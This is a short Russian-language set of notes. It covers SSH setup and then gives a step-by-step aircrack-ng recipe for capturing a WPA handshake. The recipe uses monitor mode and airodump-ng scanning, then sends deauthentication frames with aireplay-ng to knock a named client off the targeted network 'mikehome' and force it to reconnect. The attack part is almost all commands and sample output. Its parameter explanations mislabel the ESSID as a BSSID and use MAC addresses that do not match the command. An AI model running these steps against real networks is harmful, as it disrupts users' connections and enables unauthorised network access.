1. надо сгенерировать ключи:

sshd-generate

2. Сменить пароль root

passwd

3. Перезапустить ssh

service ssh restart

1. Смотрим какие есть интерфейсы, поддерживающие беспроводные расширения:

iwconfig

2. Переводим интерфейс в режим мониторинга:

airmon-ng start wlan0

В результате появится интерфейс mon0, который будет виден в iwconfig

3. Сканируем эфир и выбираем сеть. Указываем интерфейс mon0:

airodump-ng mon0

4. Запускаем airodump нацеленный на выбранную сеть, указываем канал -c 1. Тут output - это имя выходного файла.

airodump-ng -c 1 --bssid 48:5B:39:E7:BE:31 -w output mon0

5. Если клиент уже подключен, запускаем aireplay и обрываем его аутентификацию, тем самым заставляя его соединиться заново:

aireplay-ng -0 1 -e mikehome -a 48:5B:39:E7:BE:31 -c 00:26:5A:18:A5:C5 mon0

где:

-e mikehome — BSSID точки доступа
-a 00:14:6C:7E:40:80 — MAC точки доступа
-c 00:0F:B5:FD:FB:C2 — MAC клиента

И на выходе получаем:

11:09:28 Sending DeAuth to station – STMAC: [00:0F:B5:34:30:30]

Тыкать aireplay можно довольно долго, но в конце-концов в окне с airodump-ng появится справа:

WPA handshake: 48:5B:39:E7:BE:31